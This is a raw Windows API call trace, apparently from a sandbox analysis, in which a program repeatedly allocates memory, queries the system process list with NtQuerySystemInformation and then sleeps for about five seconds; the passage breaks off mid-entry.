NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.157] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.188] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.202] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.219] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.235] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.250] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.266] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.280] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.298] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.312] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.328] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.346] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.359] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.374] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.389] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.406] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.421] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.438] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.452] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.468] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.484] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 